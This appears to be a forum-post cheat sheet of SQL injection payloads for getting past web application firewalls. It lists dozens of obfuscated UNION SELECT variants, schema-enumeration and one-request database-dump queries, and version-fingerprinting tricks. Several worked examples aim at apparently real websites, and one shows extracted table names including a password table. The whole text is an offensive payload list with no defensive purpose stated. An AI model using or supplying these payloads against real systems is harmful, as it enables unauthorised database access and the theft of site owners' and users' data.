一些bypass语句

AF evasion methods for sql Injections   I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.  1) id=1+UnIoN+SeLecT 1,2,3 --+  2) id=1+UnIOn/**/SeLect 1,2,3 --+  3) id=1+UNIunionON+SELselectECT 1,2,3 --+  4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+  5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+  6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+  7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+  8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+  /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+   9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+  div + 0 Having +1 = 0 AND+ 1 = 0 /*!and*/ +1 = 0 and( 1 )=(0 ) x OR false the url query id =- 1 union all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select  +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//  http : //www.phm.ie/project.php?cat=Conservation'  +and(1)=(0) +union+distinct+select+ 1 and use: and 1=0 to apear column number in the page or +div+0 Having+1=0 +AND+1=0 +/*!and*/+1=0 and(1)=(0‏)  Hard WAF bypass tips Whitespaces : union(select(0),version(),(0),(0),(0),(0),(0),(0), (0)) %0Aunion%0Aselect%0A1,2,3-- /**/union/**/select/**/1,2,3-- like :: PHP Code: http ://www.goavenues.com/ list_itinerary.php?id=-4%20union %20%28select%201,2,version %28%29,4,5,6,7,8%29%20-- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- NICE QUERY www.zerocoolhf.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+  www.zerocoolhf.altervista.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23 =-=-=-=-=-=-=-=-=-=-=-=-=-=- Bypassing :: (Double Keyword): UNIunionON+SELselectECT +union+distinct+select+ +union+distinctROW+select+ union+/*!select*/+1,2,3 union/**/select/**/1,2,3 uni<on all sel<ect %20union%20/*!select*/%20 /**//*!union*//**//*!select*//**/ union%23aa%0Aselect /**/union/*!50000select*/ /*!20000%0d%0aunion*/+/*!20000%0d %0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f %252a*/ +%23sexsexsex%0AUnIOn%23sexsexsex %0ASeLecT+ id=1+’UnI”On’+'SeL”ECT’ <-MySQL only id=1+'UnI'||'on'+SeLeCT' <-MSSQL only like :: PHP Code: http ://www.goavenues.com/ list_itinerary.php?id=-4%20union %23aa%0Aselect%201,2,version %28%29,4,5,6,7,8%20-- PHP Code: http ://www.goavenues.com/ list_itinerary.php?id=-4%20/**/ union/*!50000select*/ %201,2,version %28%29,4,5,6,7,8%20-- PHP Code: http ://www.goavenues.com/ list_itinerary.php?id=-4%20/*! 20000%0d%0aunion*/+/*!20000%0d %0aSelEct*/%201,2,version %28%29,4,5,6,7,8%20-- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- after id no. like id=1 +/*!and*/+1=0 +div+0 Having+1=0 +AND+1=0 +/*!and*/+1=0 and(1)=(0) =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- false the url query : =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- id= - 1 union all select id= null union all select id=1 +and+false+ union+all+select id= 9999 union all select =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- Order Bypassing do like this =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- /*!table_name*/ +from /*!information_schema*/./*!tables*/ where table_schema=database() =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- unhex(hex(Concat (Column_Name,0x3e,Table_schema,0x3e,table_ Name))) /*!from*/information_schema.columns/*!where*/ column_name%20/*!like*/char(37,%20112,%2097, %20115,%20115,%2037) like :: PHP Code: http ://www.westbury.com/ article.php? article_id=-117%20union%20select %201,2,unhex%28hex%28Concat %28Column_Name,0x3e,Table_ schema, 0x3e,table_Name %29%29%29,4,5,6,7/*!from*/ information_schema.columns/*! where*/column_name%20/*!like*/ char%2837,%20112,%2097,%20115, %20115,%2037%29-- user_passwd>westbur6_website>user_info =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- used with order :: convert( using ascii) or unhex(hex()) like : PHP Code: www. westbury. com/ article. php? article_id =- 117 union select 1 , 2 , convert ( group_concat (table_name ) using ascii ), 4 , 5 ,6 , 7 + from +information_schema .tables -- IF'ascii' dosent work? you can try PHP Code: ujis ucs2 tis620 swe7 sjis macroman macce latin7 latin5 latin2 koi8u koi8r keybcs2 hp8 geostd8 gbk gb2132 armscii8 ascii binary cp1250 big5 cp1251 cp1256 cp1257 cp850     ------------------------------Best Bypass WAF------------------------------------  [~] order by [~] /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/  [~] UNION select [~] /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ + #?uNiOn + #?sEleCt + #?1q %0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ +%2F**/+Union/*!select*/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ uNiOn aLl sElEcT UNIunionON+SELselectECT /**/union/*!50000select*//**/ 0%a0union%a0select%09 %0Aunion%0Aselect%0A %55nion/**/%53elect uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ %0A%09UNION%0CSELECT%10NULL% /*!union*//*--*//*!all*//*--*//*!select*/ union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ +UnIoN/*&a=*/SeLeCT/*&a=*/ union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa%0A#%0Aselect union(select (1),(2),(3),(4),(5)) UNION(SELECT(column)FROM(table)) %23xyz%0AUnIOn%23xyz%0ASeLecT+ %23xyz%0A%55nIOn%23xyz%0A%53eLecT+ union(select(1),2,3) union (select 1111,2222,3333) uNioN (/*!/**/ SeleCT */ 11) union (select 1111,2222,3333) +#1q%0AuNiOn all#qa%0A#%0AsEleCt /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ /union/sselect/g /union/s+select/i /*!UnIoN*/SeLeCT +UnIoN/*&a=*/SeLeCT/*&a=*/ +uni>on+sel>ect+ +(UnIoN)+(SelECT)+ +(UnI)(oN)+(SeL)(EcT) +’UnI”On’+'SeL”ECT’ +uni on+sel ect+ +/*!UnIoN*/+/*!SeLeCt*/+ /*!u%6eion*/ /*!se%6cect*/ uni%20union%20/*!select*/%20 union%23aa%0Aselect /**/union/*!50000select*/ /^.*union.*$/ /^.*select.*$/ /*union*/union/*select*/select+ /*uni X on*/union/*sel X ect*/ +un/**/ion+sel/**/ect+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?<ion sel="">+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+  [~] information_schema.tables [~] /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- - /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table  [~] concat() [~] CoNcAt() concat()  CON%08CAT() CoNcAt() %0AcOnCat() /**//*!12345cOnCat*/ /*!50000cOnCat*/(/*!*/) unhex(hex(concat(table_name))) unhex(hex(/*!12345concat*/(table_name))) unhex(hex(/*!50000concat*/(table_name)))  [~] group_concat() [~] /*!group_concat*/() gRoUp_cOnCAt() group_concat(/*!*/) group_concat(/*!12345table_name*/) group_concat(/*!50000table_name*/) /*!group_concat*/(/*!12345table_name*/) /*!group_concat*/(/*!50000table_name*/) /*!12345group_concat*/(/*!12345table_name*/) /*!50000group_concat*/(/*!50000table_name*/) /*!GrOuP_ConCaT*/() /*!12345GroUP_ConCat*/() /*!50000gRouP_cOnCaT*/() /*!50000Gr%6fuP_c%6fnCAT*/() unhex(hex(group_concat(table_name))) unhex(hex(/*!group_concat*/(/*!table_name*/))) unhex(hex(/*!12345group_concat*/(table_name))) unhex(hex(/*!12345group_concat*/(/*!table_name*/))) unhex(hex(/*!12345group_concat*/(/*!12345table_name*/))) unhex(hex(/*!50000group_concat*/(table_name))) unhex(hex(/*!50000group_concat*/(/*!table_name*/))) unhex(hex(/*!50000group_concat*/(/*!50000table_name*/))) convert(group_concat(table_name)+using+ascii) convert(group_concat(/*!table_name*/)+using+ascii) convert(group_concat(/*!12345table_name*/)+using+ascii) convert(group_concat(/*!50000table_name*/)+using+ascii) CONVERT(group_concat(table_name)+USING+latin1) CONVERT(group_concat(table_name)+USING+latin2) CONVERT(group_concat(table_name)+USING+latin3) CONVERT(group_concat(table_name)+USING+latin4) CONVERT(group_concat(table_name)+USING+latin5) Group_Concat group_concat () /*!group_concat*/ () grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ ) group_concat (, 0x3c62723e ) g % 72oup_c % 6Fncat % 28 % 76% 65rsion % 28 %29 ,% 22 ~ BlackRose% 22 %29 CoNcAt () CONCAT (DISTINCT Version ()) concat (, 0x3a ,) concat %00 () % 00CoNcAt () /*!50000cOnCat*/ ( /*!Version()*/ ) /*!50000cOnCat*/ /**//*!12345cOnCat*/ (, 0x3a ,) concat_ws () concat (0x3a ,, 0x3c62723e ) /*!concat_ws(0x3a,)*/ concat_ws ( 0x3a3a3a , version() CONCAT_WS ( CHAR ( 32, 58, 32 ), version (),) REVERSE( tacnoc ) binary (version ()) uncompress (compress ( version())) aes_decrypt ( aes_encrypt ( version (), 1), 1 )[/ b ][/ u ][/ size ][/ color ]  [~] after id no. like id=1 +/*!and*/+1=0 [~] +div+0  Having+1=0  +AND+1=0  +/*!and*/+1=0  and(1)=(0)  cp852 cp866 cp932 dec8 euckr latin1 utf8 trick to appear info inside img tag PHP Code: concat( 0x223e3c62723e ,, 0x3c696d 67207372633d22 ) when the column is get into html tag,but its not always inside img tag. it could be <a> or </noscript> or anything. like :: PHP Code: http ://fzszy.chinacourt.org/ public/detail.php? id=-168' union /*! %53elect*/ concat (0x223e3c2f613e3c2f74643e, version (),0x3c6120687265663d22)--+  [DUMP DB in 1 Request] PHP Code: ( select (@) from ( select(@:= 0x00 ), ( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat (@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x ) ( select(@) from ( select (@:= 0x00 ), ( select (@) from ( table ) where (@) in (@:= concat (@, 0x0a , column1 , 0x3a , column2 )))) a )  [DUMP DB in 1 Request improve] PHP Code: ( select(@ x ) from (select (@x := 0x00 ), ( select( 0 ) from ( information_schema . columns) where ( table_schema ! = 0x696e666f726d6174696f6e5f736368656d61 )and ( 0x00 ) in(@ x := concat (@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x ) like http : //www.marinaplast.com/page.php? id=-13 union select 1,2,(select (@x)from(select(@x:=0x00),(select (0)from(information_schema.colu mns)where(table_schema! =0x696e666f726d6174696f6e5f736368656d61)and (0x00)in(@x:=concat (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --   WHITESPACES BYPASS .  %09 %0A %0B %0C %0D %A0 get version - DB_NAME - user - HOST_NAME - datadir PHP Code: version() convert( version() using latin1 ) unhex ( hex( version())) @@GLOBAL. VERSION ( substr (@@version ,1 , 1 )=5 ) :: 1 true 0 fals # like # www. marinaplast. com/ page . php? id =- 13 union select 1 , 2 ,( substr (@@version ,1 , 1 )=5 ), 4, 5 -- 1 it 's mean version 5 and 0 mean version 4 +and substring(version(),1,1)=4 +and substring(version(),1,1)=5 +and substring(version(),1,1)=9 +and substring(version(),1,1)=10 # like # www.marinaplast.com/page.php? id=13+and substring(version (),1,1)=5 download good version 5 www.marinaplast.com/page.php? id=13+and substring(version (),1,1)=4 not download good version 4 version 5 id=1 /*!50094aaaa*/ error id=1 /*!50095aaaa*/ no error id=1 /*!50096aaaa*/ error # like # www.marinaplast.com/page.php?id=13 / *!50095aaaa*/  no error v5 version 4 id=1 /*!40123 1=1*/--+- no error id=1 /*!40122rrrr*/ no error # like # www.marinaplast.com/page.php?id=13 / *!40122rrrr*/ error not v4 ☆¸.•*☆ ☆*•.¸☆ DB_NAME() @@database database() id=vv() # like # www.marinaplast.com/page.php? id=-13 union select 1,2,DB_NAME (),4,5 -- www.marinaplast.com/page.php?id=vv () ☆¸.•*☆ ☆*•.¸☆ @@user user() user_name() system_user() # like # www.marinaplast.com/page.php? id=-13 union select 1,2,user (),4,5 -- ☆¸.•*☆ ☆*•.¸☆ HOST_NAME() @@hostname @@servername SERVERPROPERTY() # like # www.marinaplast.com/page.php? id=-13 union select 1,2,HOST_NAME (),4,5 -- ☆¸.•*☆ ☆*•.¸☆ @@datadir datadir() # like # www.marinaplast.com/page.php? id=-13 union select 1,2,datadir(),4,5 -- ☆¸.•*☆ ☆*•.¸☆ ASPX and 1=0/@@version ' and 1 =0 /@@ version;-- ) and 1 =@@version-- and 1 = 0 /user ;--